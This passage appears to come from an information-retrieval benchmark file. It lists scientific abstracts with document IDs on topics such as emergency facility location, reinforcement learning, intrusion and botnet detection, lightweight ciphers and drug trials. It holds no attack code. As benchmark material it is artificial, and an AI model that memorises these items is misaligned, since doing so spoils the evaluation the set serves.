"text": "With emergencies being, unfortunately, part of our lives, it is crucial to efficiently plan and allocate emergency response facilities that deliver effective and timely relief to people most in need. Emergency Medical Services (EMS) allocation problems deal with locating EMS facilities among potential sites to provide efficient and effective services over a wide area with spatially distributed demands. It is often problematic due to the intrinsic complexity of these problems. This paper reviews covering models and optimization techniques for emergency response facility location and planning in the literature from the past few decades, while emphasizing recent developments. We introduce several typical covering models and their extensions ordered from simple to complex, including Location Set Covering Problem (LSCP), Maximal Covering Location Problem (MCLP), Double Standard Model (DSM), Maximum Expected Covering Location Problem (MEXCLP), and Maximum Availability Location Problem (MALP) models. In addition, recent developments on hypercube queuing models, dynamic allocation models, gradual covering models, and cooperative covering models are also presented in this paper. The corresponding optimization X. Li (B) · Z. Zhao · X. Zhu Department of Industrial and Information Engineering, University of Tennessee, 416 East Stadium Hall, Knoxville, TN 37919, USA e-mail: Xueping.Li@utk.edu Z. Zhao e-mail: zzhao8@utk.edu X. Zhu e-mail: xzhu5@utk.edu T. Wyatt College of Nursing, University of Tennessee, 200 Volunteer Boulevard, Knoxville, TN 37996-4180, USA e-mail: twaytt@utk.edu",
"title": ""
},
{
"docid": "bbb08c98a2265c53ba590e0872e91e1d",
"text": "Reinforcement learning (RL) is one of the most general approaches to learning control. Its applicability to complex motor systems, however, has been largely impossible so far due to the computational difficulties that reinforcement learning encounters in high dimensional continuous state-action spaces. In this paper, we derive a novel approach to RL for parameterized control policies based on the framework of stochastic optimal control with path integrals. While solidly grounded in optimal control theory and estimation theory, the update equations for learning are surprisingly simple and have no danger of numerical instabilities as neither matrix inversions nor gradient learning rates are required. Empirical evaluations demonstrate significant performance improvements over gradient-based policy learning and scalability to high-dimensional control problems. Finally, a learning experiment on a robot dog illustrates the functionality of our algorithm in a real-world scenario. We believe that our new algorithm, Policy Improvement with Path Integrals (PI2), offers currently one of the most efficient, numerically robust, and easy to implement algorithms for RL in robotics.",
"title": ""
},
{
"docid": "0188bdf1c03995b6ae2218083864fc58",
"text": "We present a simple and effective scheme for dependency parsing which is based on bidirectional-LSTMs (BiLSTMs). Each sentence token is associated with a BiLSTM vector representing the token in its sentential context, and feature vectors are constructed by concatenating a few BiLSTM vectors. The BiLSTM is trained jointly with the parser objective, resulting in very effective feature extractors for parsing. We demonstrate the effectiveness of the approach by applying it to a greedy transition-based parser as well as to a globally optimized graph-based parser. The resulting parsers have very simple architectures, and match or surpass the state-of-the-art accuracies on English and Chinese.",
"title": ""
},
{
"docid": "823de62a3e823db782180f24a4f83bb4",
"text": "This paper presents ATL (ATLAS Transformation Language): a hybrid model transformation language that allows both declarative and imperative constructs to be used in transformation definitions. The paper describes the language syntax and semantics by using examples. ATL is supported by a set of development tools such as an editor, a compiler, a virtual machine, and a debugger. A case study shows the applicability of the language constructs. Alternative ways for implementing the case study are outlined. In addition to the current features, the planned future ATL features are briefly",
"title": ""
},
{
"docid": "ca44496c768cfc73075c31a4fc010d4d",
"text": "The most downloaded articles from ScienceDirect in the last 90 days.",
"title": ""
},
{
"docid": "2aefddf5e19601c8338f852811cebdee",
"text": "This paper presents a system that allows online building of 3D wireframe models through a combination of user interaction and automated methods from a handheld camera-mouse. Crucially, the model being built is used to concurrently compute camera pose, permitting extendable tracking while enabling the user to edit the model interactively. In contrast to other model building methods that are either off-line and/or automated but computationally intensive, the aim here is to have a system that has low computational requirements and that enables the user to define what is relevant (and what is not) at the time the model is being built. OutlinAR hardware is also developed which simply consists of the combination of a camera with a wide field of view lens and a wheeled computer mouse.",
"title": ""
},
{
"docid": "72c0770dc42a2df67324df95ae4255a9",
"text": "| Integrating a large number of Web information sources may signiicantly increase the utility of the WorldWide Web. A promising solution to the integration is through the use of a Web Information mediator that provides seamless, transparent access for the clients. Information mediators need wrappers to access a Web source as a structured database, but building wrappers by hand is impractical. Previous work on wrapper induction is too restrictive to handle a large number of Web pages that contain tuples with missing attributes, multiple values, variant attribute permutations, exceptions and typos. This paper presents SoftMealy, a novel wrapper representation formalism. This representation is based on a nite-state transducer (FST) and contextual rules. This approach can wrap a wide range of semistructured Web pages because FSTs can encode each diierent attribute permutation as a path. A SoftMealy wrapper can be induced from a handful of labeled examples using our generalization algorithm. We have implemented this approach into a prototype system and tested it on real Web pages. The performance statistics shows that the sizes of the induced wrappers as well as the required training eeort are linear with regard to the structural variance of the test pages. Our experiment also shows that the induced wrappers can generalize over unseen pages.",
"title": ""
},
{
"docid": "2dbe7746af8385e316ec42f461608c08",
"text": "Many existing deep learning models for natural language processing tasks focus on learning the compositionality of their inputs, which requires expensive computations and long training times. We present a simple deep neural network that competes with and, in some cases, outperforms such models on sentiment analysis and factoid question answering tasks while taking only a fraction of the training time. While our model is syntactically-ignorant, we show significant improvements over previous bag-of-words models by deepening our network, applying a novel variant of dropout, and initializing with pretrained word embeddings. Moreover, our model performs better than syntactic models on datasets with high syntactic variance. Our results indicate that for the tasks we consider, nonlinearly transforming the input is more important than tailoring a network to model word order and syntax.",
"title": ""
},
{
"docid": "97202b135a3c4d641b6ffe8f36778619",
"text": "This paper proposes a new method for human posture recognition from top-view depth maps on small training datasets. There are two strategies developed to leverage the capability of convolution neural network (CNN) in mining the fundamental and generic features for recognition. First, the early layers of CNN should serve the function to extract feature without specific representation. By applying the concept of transfer learning, the first few layers from the pre-learned VGG model can be used directly without further fine-tuning. To alleviate the computational loading and to increase the accuracy of our partially transferred model, a cross-layer inheriting feature fusion (CLIFF) is proposed by using the information from the early layer in fully connected layer without further processing. The experimental result shows that combination of partial transferred model and CLIFF can provide better performance than VGG16 [1] model with re-trained FC layer and other hand-crafted features like RBPs [2].",
"title": ""
},
{
"docid": "f31138cf18018ef2df82cc121f6f2721",
"text": "In this paper, we present EPCBC, a lightweight cipher that has 96-bit key size and 48-bit/96-bit block size. This is suitable for Electronic Product Code (EPC) encryption, which uses low-cost passive RFID-tags and exactly 96 bits as a unique identifier on the item level. EPCBC is based on a generalized PRESENT with block size 48 and 96 bits for the main cipher structure and customized key schedule design which provides strong protection against related-key differential attacks, a recent class of powerful attacks on AES. Related-key attacks are especially relevant when a block cipher is used as a hash function. In the course of proving the security of EPCBC, we could leverage on the extensive security analyses of PRESENT, but we also obtain new results on the differential and linear cryptanalysis bounds for the generalized PRESENT when the block size is less than 64 bits, and much tighter bounds otherwise. Further, we analyze the resistance of EPCBC against integral cryptanalysis, statistical saturation attack, slide attack, algebraic attack and the latest higher-order differential cryptanalysis from FSE 2011 [11]. Our proposed cipher would be the most efficient at EPC encryption, since for other ciphers such as AES and PRESENT, it is necessary to encrypt 128-bit blocks (which results in a 33% overhead being incurred). The efficiency of our proposal therefore leads to huge market implications. Another contribution is an optimized implementation of PRESENT that is smaller and faster than previously published results.",
"title": ""
},
{
"docid": "d23df7fd9a9a0e847604bbdbe8ce04e8",
"text": "In this paper, we propose and implement a hybrid model combining two-directional two-dimensional principal component analysis ((2D)2PCA) and a Radial Basis Function Neural Network (RBFNN) to forecast stock market behavior. First, 36 stock market technical variables are selected as the input features, and a sliding window is used to obtain the input data of the model. Next, (2D)2PCA is utilized to reduce the dimension of the data and extract its intrinsic features. Finally, an RBFNN accepts the data processed by (2D)2PCA to forecast the next day's stock price or movement. The proposed model is used on the Shanghai stock market index, and the experiments show that the model achieves a good level of fitness. The proposed model is then compared with one that uses the traditional dimension reduction method principal component analysis (PCA) and independent component analysis (ICA). The empirical results show that the proposed model outperforms the PCA-based model, as well as alternative models based on ICA and on the multilayer perceptron.",
"title": ""
},
{
"docid": "7c89edeaffe5017adbfd1e4f810e2af8",
"text": "BACKGROUND\nAmbrisentan is a propanoic acid-based, A-selective endothelin receptor antagonist for the once-daily treatment of pulmonary arterial hypertension.\n\n\nMETHODS AND RESULTS\nAmbrisentan in Pulmonary Arterial Hypertension, Randomized, Double-Blind, Placebo-Controlled, Multicenter, Efficacy Study 1 and 2 (ARIES-1 and ARIES-2) were concurrent, double-blind, placebo-controlled studies that randomized 202 and 192 patients with pulmonary arterial hypertension, respectively, to placebo or ambrisentan (ARIES-1, 5 or 10 mg; ARIES-2, 2.5 or 5 mg) orally once daily for 12 weeks. The primary end point for each study was change in 6-minute walk distance from baseline to week 12. Clinical worsening, World Health Organization functional class, Short Form-36 Health Survey score, Borg dyspnea score, and B-type natriuretic peptide plasma concentrations also were assessed. In addition, a long-term extension study was performed. The 6-minute walk distance increased in all ambrisentan groups; mean placebo-corrected treatment effects were 31 m (P=0.008) and 51 m (P<0.001) in ARIES-1 for 5 and 10 mg ambrisentan, respectively, and 32 m (P=0.022) and 59 m (P<0.001) in ARIES-2 for 2.5 and 5 mg ambrisentan, respectively. Improvements in time to clinical worsening (ARIES-2), World Health Organization functional class (ARIES-1), Short Form-36 score (ARIES-2), Borg dyspnea score (both studies), and B-type natriuretic peptide (both studies) were observed. No patient treated with ambrisentan developed aminotransferase concentrations >3 times the upper limit of normal. In 280 patients completing 48 weeks of treatment with ambrisentan monotherapy, the improvement from baseline in 6-minute walk at 48 weeks was 39 m.\n\n\nCONCLUSIONS\nAmbrisentan improves exercise capacity in patients with pulmonary arterial hypertension. Improvements were observed for several secondary end points in each of the studies, although statistical significance was more variable. Ambrisentan is well tolerated and is associated with a low risk of aminotransferase abnormalities.",
"title": ""
},
{
"docid": "ab6668e9c2d35cdb1a359c77b2de2a03",
"text": "This paper discusses the question whether online retailers can diversify from their competitors by reaching out to new delivery concepts for last mile logistics. We choose an empirical study to ask 250 potential online consumers about their opinion and preferences of online trading and last mile delivery to show the importance of new delivery strategies in order to deal with the rising challenges of high growth rates in E-Commerce business for retailers and logistic service providers.",
"title": ""
},
{
"docid": "d225b334a1feff4326e7a5779b50267f",
"text": "We compare the fast training and decoding speed of RETURNN of attention models for translation, due to fast CUDA LSTM kernels, and a fast pure TensorFlow beam search decoder. We show that a layer-wise pretraining scheme for recurrent attention models gives over 1% BLEU improvement absolute and it allows to train deeper recurrent encoder networks. Promising preliminary results on max. expected BLEU training are presented. We obtain state-of-the-art models trained on the WMT 2017 German↔English translation task. We also present end-to-end model results for speech recognition on the Switchboard task. The flexibility of RETURNN allows a fast research feedback loop to experiment with alternative architectures, and its generality allows to use it on a wide range of applications.",
"title": ""
},
{
"docid": "8411c13863aeb4338327ea76e0e2725b",
"text": "There is often the need to update an installed Intrusion Detection System (IDS) due to new attack methods or upgraded computing environments. Since many current IDSs are constructed by manual encoding of expert security knowledge, changes to IDSs are expensive and slow. In this paper, we describe a data mining framework for adaptively building Intrusion Detection (ID) models. The central idea is to utilize auditing programs to extract an extensive set of features that describe each network connection or host session, and apply data mining programs to learn rules that accurately capture the behavior of intrusions and normal activities. These rules can then be used for misuse detection and anomaly detection. Detection models for new intrusions or specific components of a network system are incorporated into an existing IDS through a meta-learning (or co-operative learning) process, which produces a meta detection model that combines evidence from multiple models. We discuss the strengths of our data mining programs, namely, classification, meta-learning, association rules, and frequent episodes. We report our results of applying these programs to the (extensively gathered) network audit data from the DARPA Intrusion Detection Evaluation Program.",
"title": ""
},
{
"docid": "47d0f4f76d809ccc88a84a2abed4a1ce",
"text": "Detecting unintended falls is essential for ambient intelligence and healthcare of elderly people living alone. In recent years, deep convolutional nets are widely used in human action analysis, based on which a number of fall detection methods have been proposed. Despite their highly effective performances, the behaviors of how the convolutional nets recognize falls are still not clear. In this paper, instead of proposing a novel approach, we perform a systematical empirical study, attempting to investigate the underlying fall recognition process. We propose four tasks to investigate, which involve five types of input modalities, seven net instances and different training samples. The obtained quantitative and qualitative results reveal the patterns that the nets tend to learn, and several factors that can heavily influence the performances on fall recognition. We expect that our conclusions are favorable to proposing better deep learning solutions to fall detection systems.",
"title": ""
},
{
"docid": "61c4146ac8b55167746d3f2b9c8b64e8",
"text": "In a variety of Network-based Intrusion Detection System (NIDS) applications, one desires to detect groups of unknown attack (e.g., botnet) packet-flows, with a group potentially manifesting its atypicality (relative to a known reference “normal”/null model) on a low-dimensional subset of the full measured set of features used by the IDS. What makes this anomaly detection problem quite challenging is that it is a priori unknown which (possibly sparse) subset of features jointly characterizes a particular application, especially one that has not been seen before, which thus represents an unknown behavioral class (zero-day threat). Moreover, nowadays botnets have become evasive, evolving their behavior to avoid signature-based IDSes. In this work, we apply a novel active learning (AL) framework for botnet detection, facilitating detection of unknown botnets (assuming no ground truth examples of same). We propose a new anomaly-based feature set that captures the informative features and exploits the sequence of packet directions in a given flow. Experiments on real world network traffic data, including several common Zeus botnet instances, demonstrate the advantage of our proposed features and AL system.",
"title": ""
}
] | scidocsrr |
2f600546a7f938b6d0ba270ce55e5fc2 | Using Mise-En-Scène Visual Features based on MPEG-7 and Deep Learning for Movie Recommendation | [
{
"docid": "1014b49b41b573cb81d50f6e8123c894",
"text": "There is much video available today. To help viewers find video of interest, work has begun on methods of automatic video classification. In this paper, we survey the video classification literature. We find that features are drawn from three modalities - text, audio, and visual - and that a large variety of combinations of features and classification have been explored. We describe the general features chosen and summarize the research in this area. We conclude with ideas for further research.",
"title": ""
},
{
"docid": "e3b7d2c4cd3e3d860db8d4751c9eed25",
"text": "While recommender systems tell users what items they might like, explanations of recommendations reveal why they might like them. Explanations provide many benefits, from improving user satisfaction to helping users make better decisions. This paper introduces tagsplanations, which are explanations based on community tags. Tagsplanations have two key components: tag relevance, the degree to which a tag describes an item, and tag preference, the user's sentiment toward a tag. We develop novel algorithms for estimating tag relevance and tag preference, and we conduct a user study exploring the roles of tag relevance and tag preference in promoting effective tagsplanations. We also examine which types of tags are most useful for tagsplanations.",
"title": ""
}
] | [
{
"docid": "088011257e741b8d08a3b44978134830",
"text": "This paper deals with the kinematic and dynamic analyses of the Orthoglide 5-axis, a five-degree-of-freedom manipulator. It is derived from two manipulators: i) the Orthoglide 3-axis; a three dof translational manipulator and ii) the Agile eye; a parallel spherical wrist. First, the kinematic and dynamic models of the Orthoglide 5-axis are developed. The geometric and inertial parameters of the manipulator are determined by means of a CAD software. Then, the required motors performances are evaluated for some test trajectories. Finally, the motors are selected in the catalogue from the previous results.",
"title": ""
},
{
"docid": "46360fec3d7fa0adbe08bb4b5bb05847",
"text": "Previous approaches to action recognition with deep features tend to process video frames only within a small temporal region, and do not model long-range dynamic information explicitly. However, such information is important for the accurate recognition of actions, especially for the discrimination of complex activities that share sub-actions, and when dealing with untrimmed videos. Here, we propose a representation, VLAD for Deep Dynamics (VLAD3), that accounts for different levels of video dynamics. It captures short-term dynamics with deep convolutional neural network features, relying on linear dynamic systems (LDS) to model medium-range dynamics. To account for long-range inhomogeneous dynamics, a VLAD descriptor is derived for the LDS and pooled over the whole video, to arrive at the final VLAD3 representation. An extensive evaluation was performed on Olympic Sports, UCF101 and THUMOS15, where the use of the VLAD3 representation leads to state-of-the-art results.",
"title": ""
},
{
"docid": "91c5e41422817f181d974ceab0117d7b",
"text": "BACKGROUND\nIn recent years, the rate of peritonitis during continuous ambulatory peritoneal dialysis (CAPD) has been significantly reduced. However, peritonitis remains a major complication of CAPD, accounting for considerable mortality and hospitalization among CAPD patients.\n\n\nOBJECTIVE\nTo generate a \"center tailored\" treatment protocol for CAPD peritonitis by examining the changes of causative organisms and their susceptibilities to antimicrobial agents over the past 10 years.\n\n\nMETHOD\nRetrospective review of the medical records of 1015 CAPD patients (1108 episodes of peritonitis) who were followed up from 1992 through 2001.\n\n\nRESULTS\nThe overall incidence of peritonitis was 0.40 episodes/patient-year. The annual rate of peritonitis and the incidence of peritonitis caused by a single gram-positive organism were significantly higher in 1992 and 1993 compared with those in the rest of the years (p < 0.05). The incidence of peritonitis due to coagulase-negative staphylococcus (CoNS) decreased significantly over time, whereas there was no significant change in the incidence of Staphylococcus aureus (SA)-induced peritonitis. Among CoNS, resistance to methicillin increased from 18.4% in 1992-1993 to 41.7% in 2000-2001 (p < 0.05). In contrast, the incidence of methicillin-resistant SA was not different according to the calendar year. Catheter removal rates were significantly higher in peritonitis due to a single gram-negative organism (16.6%) compared with gram-positive peritonitis (4.8%, p < 0.005). The mortality associated with peritonitis was also higher in gram-negative (3.7%) compared with gram-positive peritonitis (1.4%), but there was no statistical significance. Among single gram-positive organism-induced peritonitis, catheter removal rates were significantly higher in SA (9.3%) than those in CoNS (2.9%, p < 0.01) and other gram-positive organisms (2.9%, p < 0.05). In peritonitis caused by CoNS, the methicillin-resistant group showed significantly higher removal rates than the methicillin-susceptible group (8.2% vs 1.0%, p < 0.01).\n\n\nCONCLUSION\nThe incidence of peritonitis for 2001 decreased to less than half that for 1992, due mainly to a significant decrease in CoNS-induced peritonitis, whereas the proportions of peritonitis due to a single gram-negative organism and methicillin-resistant CoNS increased. These findings suggest that it is necessary to prepare new center-based guidelines for the initial empirical treatment of CAPD peritonitis.",
"title": ""
},
{
"docid": "840919760f5cc4839fe027d3a744dbd3",
"text": "This paper deals with the development and implementation of an on-line stator resistance and permanent magnet flux linkage identification approach devoted to three-phase and open-end winding permanent magnet synchronous motor drives. In particular, the stator resistance and the permanent magnet flux linkage variations are independently determined by exploiting a current vector control strategy, in which one of the phase currents is continuously maintained to zero while the others are suitably modified in order to establish the same rotating magnetomotive force. Moreover, other motor parameters can be evaluated after re-establishing the normal operation of the drive, under the same operating conditions. As will be demonstrated, neither additional sensors nor special tests are required in the proposed method; Motor electrical parameters can be “on-line” estimated in a wide operating range, avoiding any detrimental impact on the torque capability of the PMSM drive.",
"title": ""
},
{
"docid": "181463723aaaf766e387ea292cba8d5d",
"text": "Computational thinking has been promoted in recent years as a skill that is as fundamental as being able to read, write, and do arithmetic. However, what computational thinking really means remains speculative. While wonders, discussions and debates will likely continue, this article provides some analysis aimed to further the understanding of the notion. It argues that computational thinking is likely a hybrid thinking paradigm that must accommodate different thinking modes in terms of the way each would influence what we do in computation. Furthermore, the article makes an attempt to define computational thinking and connect the (potential) thinking elements to the known thinking paradigms. Finally, the author discusses some implications of the analysis.",
"title": ""
},
{
"docid": "b27276c9743bdb33c0cb807653588521",
"text": "Most previous neurophysiological studies evoked emotions by presenting visual stimuli. Models of the emotion circuits in the brain have for the most part ignored emotions arising from musical stimuli. To our knowledge, this is the first emotion brain study which examined the influence of visual and musical stimuli on brain processing. Highly arousing pictures of the International Affective Picture System and classical musical excerpts were chosen to evoke the three basic emotions of happiness, sadness and fear. The emotional stimuli modalities were presented for 70 s either alone or combined (congruent) in a counterbalanced and random order. Electroencephalogram (EEG) Alpha-Power-Density, which is inversely related to neural electrical activity, in 30 scalp electrodes from 24 right-handed healthy female subjects, was recorded. In addition, heart rate (HR), skin conductance responses (SCR), respiration, temperature and psychometrical ratings were collected. Results showed that the experienced quality of the presented emotions was most accurate in the combined conditions, intermediate in the picture conditions and lowest in the sound conditions. Furthermore, both the psychometrical ratings and the physiological involvement measurements (SCR, HR, Respiration) were significantly increased in the combined and sound conditions compared to the picture conditions. Finally, repeated measures ANOVA revealed the largest Alpha-Power-Density for the sound conditions, intermediate for the picture conditions, and lowest for the combined conditions, indicating the strongest activation in the combined conditions in a distributed emotion and arousal network comprising frontal, temporal, parietal and occipital neural structures. Summing up, these findings demonstrate that music can markedly enhance the emotional experience evoked by affective pictures.",
"title": ""
},
{
"docid": "7b42a64b3fbf6548365d8945366af9e9",
"text": "In recent years, Convolutional Neural Networks (ConvNets) have become the quintessential component of several state-of-the-art Artificial Intelligence tasks. Across the spectrum of applications, the performance needs vary significantly, from high-throughput image recognition to the very low-latency requirements of autonomous cars. In this context, FPGAs can provide a potential platform that can be optimally configured based on different performance requirements. However, with the increasing complexity of ConvNet models, the architectural design space becomes overwhelmingly large, asking for principled design flows that address the application-level needs. This paper presents a latency-driven design methodology for mapping ConvNets on FPGAs. The proposed design flow employs novel transformations over a Synchronous Dataflow-based modelling framework together with a latency-centric optimisation procedure in order to efficiently explore the design space targeting low-latency designs. Quantitative evaluation shows large improvements in latency when latency-driven optimisation is in place yielding designs that improve the latency of AlexNet by 73.54× and VGG16 by 5.61× over throughput-optimised designs.",
"title": ""
},
{
"docid": "c049f188b31bbc482e16d22a8061abfa",
"text": "SDN deployments rely on switches that come from various vendors and differ in terms of performance and available features. Understanding these differences and performance characteristics is essential for ensuring successful deployments. In this paper we measure, report, and explain the performance characteristics of flow table updates in three hardware OpenFlow switches. Our results can help controller developers to make their programs efficient. Further, we also highlight differences between the OpenFlow specification and its implementations, that if ignored, pose a serious threat to network security and correctness.",
"title": ""
},
{
"docid": "bdcb688bc914307d811114b2749e47c2",
"text": "E-government initiatives are in their infancy in many developing countries. The success of these initiatives is dependent on government support as well as citizens' adoption of e-government services. This study adopted the unified of acceptance and use of technology (UTAUT) model to explore factors that determine the adoption of e-government services in a developing country, namely Kuwait. 880 students were surveyed, using an amended version of the UTAUT model. The empirical data reveal that performance expectancy, effort expectancy and peer influence determine students' behavioural intention. Moreover, facilitating conditions and behavioural intentions determine students' use of e-government services. Implications for decision makers and suggestions for further research are also considered in this study.",
"title": ""
},
{
"docid": "31cf550d44266e967716560faeb30f2b",
"text": "The explosion in workload complexity and the recent slow-down in Moore’s law scaling call for new approaches towards efficient computing. Researchers are now beginning to use recent advances in machine learning in software optimizations, augmenting or replacing traditional heuristics and data structures. However, the space of machine learning for computer hardware architecture is only lightly explored. In this paper, we demonstrate the potential of deep learning to address the von Neumann bottleneck of memory performance. We focus on the critical problem of learning memory access patterns, with the goal of constructing accurate and efficient memory prefetchers. We relate contemporary prefetching strategies to n-gram models in natural language processing, and show how recurrent neural networks can serve as a drop-in replacement. On a suite of challenging benchmark datasets, we find that neural networks consistently demonstrate superior performance in terms of precision and recall. This work represents the first step towards practical neural-network based prefetching, and opens a wide range of exciting directions for machine learning in computer architecture research.",
"title": ""
},
{
"docid": "4d93be453dcb767faca082d966af5f3a",
"text": "This paper presents a unified variational formulation for joint object segmentation and stereo matching, which takes both accuracy and efficiency into account. In our approach, depth-map consists of compact objects, each object is represented through three different aspects: the perimeter in image space; the slanted object depth plane; and the planar bias, which is to add an additional level of detail on top of each object plane in order to model depth variations within an object. Compared with traditional high quality solving methods in low level, we use a convex formulation of the multilabel Potts Model with PatchMatch stereo techniques to generate depth-map at each image in object level and show that accurate multiple view reconstruction can be achieved with our formulation by means of induced homography without discretization or staircasing artifacts. Our model is formulated as an energy minimization that is optimized via a fast primal-dual algorithm, which can handle several hundred object depth segments efficiently. Performance evaluations in the Middlebury benchmark data sets show that our method outperforms the traditional integer-valued disparity strategy as well as the original PatchMatch algorithm and its variants in subpixel accurate disparity estimation. The proposed algorithm is also evaluated and shown to produce consistently good results for various real-world data sets (KITTI benchmark data sets and multiview benchmark data sets).",
"title": ""
},
{
"docid": "72607f5a6371e1d3e390c93bd0dff25b",
"text": "In this paper we present ASPOGAMO, a vision system capable of estimating motion trajectories of soccer players taped on video. The system performs well in a multitude of application scenarios because of its adaptivity to various camera setups, such as single or multiple camera settings, static or dynamic ones. Furthermore, ASPOGAMO can directly process image streams taken from TV broadcast, and extract all valuable information despite scene interruptions and cuts between different cameras. The system achieves a high level of robustness through the use of modelbased vision algorithms for camera estimation and player recognition and a probabilistic multi-player tracking framework capable of dealing with occlusion situations typical in team-sports. The continuous interplay between these submodules is adding to both the reliability and the efficiency of the overall system.",
"title": ""
},
{
"docid": "d96eecc4b27d8717c07562686f702066",
"text": "The paper’s research purpose is to discuss the key firm-specific IT capability and its impact on the business value of IT. In the context of IT application in China, the paper builds research model based on Resource-Based View, this model describes how the partnership between business and IT management partially mediates the effects of IT infrastructure capability and managerial IT skills on the organization-level of IT assimilation(as proxy for business value of IT ). This research releases 105 questionnaires to part-time MBA in the Renmin University of China and gets 70 valid questionnaires, then analyzed the measurement and structural research model by PLS method. The result of the structural model shows the investment in infrastructure capability and managerial IT skills should be transformed into the partnership between IT and business, and then influence the IT assimilation. The paper can give suggestions to the firms about how to identify and improve IT capability, which will help organization to get superior business value from IT investment.",
"title": ""
},
{
"docid": "577e229bb458d01fcf72119956844bb2",
"text": "This paper examines the role of culture as a factor in enhancing the effectiveness of health communication. We describe culture and how it may be applied in audience segmentation and introduce a model of health communication planning--McGuire's communication/persuasion model--as a framework for considering the ways in which culture may influence health communication effectiveness. For three components of the model (source, message, and channel factors), the paper reviews how each affects communication and persuasion, and how each may be affected by culture. We conclude with recommendations for future research on culture and health communication.",
"title": ""
},
{
"docid": "0df1a06896fc4a98ee2d98f9e81a6969",
"text": "Today, 77GHz FMCW (Frequency Modulation Continuous Wave) radar sensors are used for automotive applications. In typical automotive radar, the target of interest is a moving target. Thus, to improve the detection probability and reduce the false alarm rate, an MTD(Moving Target Detection) algorithm should be required. This paper describes the proposed two-step MTD algorithm. The 1st MTD processing consists of a clutter cancellation step and a noise cancellation step. The two steps can cancel almost all clutter including stationary targets. However, clutter still remains among the interest beat frequencies detected during the 1st MTD and CFAR (Constant False Alarm) processing. Thus, in the 2nd MTD step, we remove the rest of the clutter with zero phase variation.",
"title": ""
},
{
"docid": "bd320ffcd9c28e2c3ea2d69039bfdbe9",
"text": "3D LiDAR scanners are playing an increasingly important role in autonomous driving as they can generate depth information of the environment. However, creating large 3D LiDAR point cloud datasets with point-level labels requires a significant amount of manual annotation. This jeopardizes the efficient development of supervised deep learning algorithms which are often data-hungry. We present a framework to rapidly create point clouds with accurate point-level labels from a computer game. To our best knowledge, this is the first publication on LiDAR point cloud simulation framework for autonomous driving. The framework supports data collection from both auto-driving scenes and user-configured scenes. Point clouds from auto-driving scenes can be used as training data for deep learning algorithms, while point clouds from user-configured scenes can be used to systematically test the vulnerability of a neural network, and use the falsifying examples to make the neural network more robust through retraining. In addition, the scene images can be captured simultaneously in order for sensor fusion tasks, with a method proposed to do automatic registration between the point clouds and captured scene images. We show a significant improvement in accuracy (+9%) in point cloud segmentation by augmenting the training dataset with the generated synthesized data. Our experiments also show by testing and retraining the network using point clouds from user-configured scenes, the weakness/blind spots of the neural network can be fixed.",
"title": ""
},
{
"docid": "b814b220d6ea8a9b304b96c55fc968f3",
"text": "The blockchain initially gained traction in 2008 as the technology underlying Bitcoin [105], but now has been employed in a diverse range of applications and created a global market worth over $150B as of 2017. What distinguishes blockchains from traditional distributed databases is the ability to operate in a decentralized setting without relying on a trusted third party. As such their core technical component is consensus: how to reach agreement among a group of nodes. This has been extensively studied already in the distributed systems community for closed systems, but its application to open blockchains has revitalized the field and led to a plethora of new designs. The inherent complexity of consensus protocols and their rapid and dramatic evolution makes it hard to contextualize the design landscape. We address this challenge by conducting a systematic and comprehensive study of blockchain consensus protocols. After first discussing key themes in classical consensus protocols, we describe: (i) protocols based on proof-of-work (PoW), (ii) proof-of-X (PoX) protocols that replace PoW with more energy-efficient alternatives, and (iii) hybrid protocols that are compositions or variations of classical consensus protocols. We develop a framework to evaluate their performance, security and design properties, and use it to systematize key themes in the protocol categories described above. This evaluation leads us to identify research gaps and challenges for the community to consider in future research endeavours.",
"title": ""
},
{
"docid": "4b546f3bc34237d31c862576ecf63f9a",
"text": "Optimizing the internal supply chain for direct or production goods was a major element during the implementation of enterprise resource planning systems (ERP) which has taken place since the late 1980s. However, supply chains to the suppliers of indirect materials were not usually included due to low transaction volumes, low product values and low strategic importance of these goods. With the advent of the Internet, systems for streamlining indirect goods supply chains emerged and were adopted by many companies. In view of the paperprone processes in many companies, the implementation of these electronic procurement systems led to substantial improvement potentials. This research reports the quantitative and qualitative results of a benchmarking study which explores the use of the Internet in procurement (eProcurement). Among the major goals are to obtain more insight on how European and North American companies used and introduced eProcurement solutions as well as how these systems enhanced the procurement function. The analysis presents a heterogeneous picture and shows that all analyzed solutions emphasize different parts of the procurement and coordination process. Based on interviews and case studies the research proposes an initial set of generalized success factors which may improve future implementations and stimulate further success factor research.",
"title": ""
}
] | scidocsrr |
ce51c97a4926c640f8c461b852b867b4 | Artificial Intelligence and Machine Learning in Radiology: Opportunities, Challenges, Pitfalls, and Criteria for Success. | [
{
"docid": "ec90e30c0ae657f25600378721b82427",
"text": "We use deep max-pooling convolutional neural networks to detect mitosis in breast histology images. The networks are trained to classify each pixel in the images, using as context a patch centered on the pixel. Simple postprocessing is then applied to the network output. Our approach won the ICPR 2012 mitosis detection competition, outperforming other contestants by a significant margin.",
"title": ""
},
{
"docid": "b27224825bb28b9b8d0eea37f8900d42",
"text": "The use of Convolutional Neural Networks (CNN) in natural im age classification systems has produced very impressive results. Combined wit h the inherent nature of medical images that make them ideal for deep-learning, fu rther application of such systems to medical image classification holds much prom ise. However, the usefulness and potential impact of such a system can be compl etely negated if it does not reach a target accuracy. In this paper, we present a s tudy on determining the optimum size of the training data set necessary to achiev e igh classification accuracy with low variance in medical image classification s ystems. The CNN was applied to classify axial Computed Tomography (CT) imag es into six anatomical classes. We trained the CNN using six different sizes of training data set ( 5, 10, 20, 50, 100, and200) and then tested the resulting system with a total of 6000 CT images. All images were acquired from the Massachusetts G eneral Hospital (MGH) Picture Archiving and Communication System (PACS). U sing this data, we employ the learning curve approach to predict classificat ion ccuracy at a given training sample size. Our research will present a general me thodology for determining the training data set size necessary to achieve a cert in target classification accuracy that can be easily applied to other problems within such systems.",
"title": ""
}
] | [
{
"docid": "4b2b4caa7dbf747833ff0f5f669ffa64",
